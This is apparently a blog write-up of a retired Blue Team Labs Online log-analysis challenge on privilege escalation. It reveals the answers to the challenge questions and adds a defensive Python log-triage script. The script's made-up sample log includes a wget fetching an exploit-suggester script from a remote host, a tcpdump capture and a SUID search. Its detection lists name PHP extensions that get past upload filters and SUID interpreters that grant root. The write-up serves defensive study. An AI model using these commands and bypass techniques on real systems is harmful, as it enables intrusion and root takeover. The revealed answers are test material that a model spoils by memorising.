BTLO Challenge: Log Analysis – Privilege Escalation


Description:


This is a retired Challenge from Blue Team Labs Online, categorized as Easy and CTF-like. You can try to solve it yourself after registering on the platform; like most of their Challenges, this one is free as well.
Besides Challenges they also offer Investigations. Most of these require a PRO subscription, but head to the platform and check out the current state.


I found out about this platform from Gerald Auger, Ph.D., book author and chief content creator of Simply Cyber, an information security YouTube channel. Watching his live streams I once won a one-month PRO BTLO subscription, so if you are interested in this field and occasional InfoSec giveaways are your kind of giveaways, you don’t want to miss out on his content.


Task:


You are presented with a scenario description, reading material, and a log file from an attacked server.


Working from the log file, you have to answer questions about the event that took place. To avoid spoiling the Challenge, the answers are hidden: click on a question below and its answer will be revealed.

1. What user (other than ‘root’) is present on the server?
   Answer: daniel

2. What script did the attacker try to download to the server?
   Answer: linux-exploit-suggester.sh

3. What packet analyzer tool did the attacker try to use?
   Answer: tcpdump

4. What file extension did the attacker use to bypass the file upload filter implemented by the developer?
   Answer: .phtml

5. Based on the commands run by the attacker before removing the PHP shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access? 1- Reverse Shell ; 2- File Upload ; 3- File Write ; 4- SUID ; 5- Library load
   Answer: 4 (SUID)
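As an added example (my own code, not part of this write-up or of BTLO's material), the script below shows how a defender can pull the same kinds of indicators the five questions ask about out of a server log with a few regexes: non-root logins, scripts fetched with wget/curl, packet-sniffer invocations, uploads that slipped past a ".php"-only filter, and SUID-root interpreters that explain the privilege escalation. The log format and every event in `SAMPLE_LOG` are constructed for the example; the real challenge file has its own layout, so the patterns would need adapting to it.

```python
import re
from typing import Dict, List

# Constructed sample events (assumed format "<timestamp> <source> <message>",
# one event per line). This is NOT the challenge's real log file.
SAMPLE_LOG = """\
2021-03-01T10:00:01 auth sshd[811]: Accepted password for daniel from 10.0.0.5 port 51122 ssh2
2021-03-01T10:00:40 auth sshd[815]: Accepted publickey for root from 10.0.0.9 port 51130 ssh2
2021-03-01T10:02:10 web POST /upload.php 403 file=shell.php
2021-03-01T10:02:12 web POST /upload.php 200 file=shell.phtml
2021-03-01T10:03:44 shell uid=33 cmd=wget http://10.0.0.5/linux-exploit-suggester.sh
2021-03-01T10:04:02 shell uid=33 cmd=tcpdump -i eth0 -w capture.pcap
2021-03-01T10:05:13 shell uid=33 cmd=find / -perm -4000 -type f
2021-03-01T10:05:14 shell uid=33 out=-rwsr-xr-x 1 root root 4551408 /usr/bin/python3
2021-03-01T10:06:30 shell uid=0 cmd=rm /var/www/html/uploads/shell.phtml
"""

LOGIN_RE = re.compile(r"Accepted \w+ for (\S+) from")
FETCH_RE = re.compile(r"cmd=(?:wget|curl)\b.*?(\S+\.(?:sh|py|pl|elf|bin))(?:\s|$)")
SNIFFER_RE = re.compile(r"cmd=(tcpdump|tshark|dumpcap)\b")
UPLOAD_RE = re.compile(r"POST \S+ (\d{3}) file=(\S+)")
SUID_RE = re.compile(r"out=-rws\S+ \d+ root \S+ \d+ (\S+)")

# Extensions many PHP setups still execute. A filter that only blocks ".php"
# is bypassed by them, which is why an upload filter should whitelist types.
ALT_PHP_EXT = (".phtml", ".phar", ".php3", ".php4", ".php5", ".phps")
# Interpreters that should never be SUID root: a SUID interpreter hands the
# caller an effective uid of 0 for arbitrary code.
INTERPRETERS = ("python", "perl", "ruby", "php")


def users_logged_in(lines: List[str], ignore=("root",)) -> List[str]:
    """Distinct accounts with accepted SSH logins, excluding ignored ones."""
    seen: List[str] = []
    for line in lines:
        m = LOGIN_RE.search(line)
        if m and m.group(1) not in ignore and m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def downloaded_scripts(lines: List[str]) -> List[str]:
    """Basenames of script-like files fetched with wget or curl."""
    return [m.group(1).rsplit("/", 1)[-1] for m in map(FETCH_RE.search, lines) if m]


def sniffer_invocations(lines: List[str]) -> List[str]:
    """Packet-capture tools the shell log shows being executed."""
    return [m.group(1) for m in map(SNIFFER_RE.search, lines) if m]


def accepted_alt_php_uploads(lines: List[str]) -> List[str]:
    """Uploads the web tier accepted (2xx) with a non-.php PHP extension."""
    hits: List[str] = []
    for line in lines:
        m = UPLOAD_RE.search(line)
        if m and m.group(1).startswith("2") and m.group(2).lower().endswith(ALT_PHP_EXT):
            hits.append(m.group(2))
    return hits


def suid_root_binaries(lines: List[str]) -> List[str]:
    """Paths from ls-style output lines that show a root-owned SUID binary."""
    return [m.group(1) for m in map(SUID_RE.search, lines) if m]


def likely_privesc(suid: List[str]) -> str:
    """Classify the escalation vector: a SUID-root interpreter means 'SUID'."""
    for path in suid:
        if path.rsplit("/", 1)[-1].startswith(INTERPRETERS):
            return "SUID"
    return "unknown"


def triage(log: str) -> Dict[str, object]:
    """Run every extractor over the log and return one findings dict."""
    lines = log.splitlines()
    suid = suid_root_binaries(lines)
    return {
        "users": users_logged_in(lines),
        "downloaded_scripts": downloaded_scripts(lines),
        "sniffers": sniffer_invocations(lines),
        "filter_bypass_uploads": accepted_alt_php_uploads(lines),
        "suid_root": suid,
        "privesc": likely_privesc(suid),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The point of `accepted_alt_php_uploads` is the mitigation hint behind question 4: checking the accepted upload against a list of alternative PHP extensions catches exactly the bypass a deny-list filter misses, and the same list is what a fixed upload handler should reject (or, better, replace with an allow-list of harmless types). `likely_privesc` only flags interpreters, since a SUID bit on `/usr/bin/python3` is a misconfiguration regardless of what was run through it.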

Other free resources:
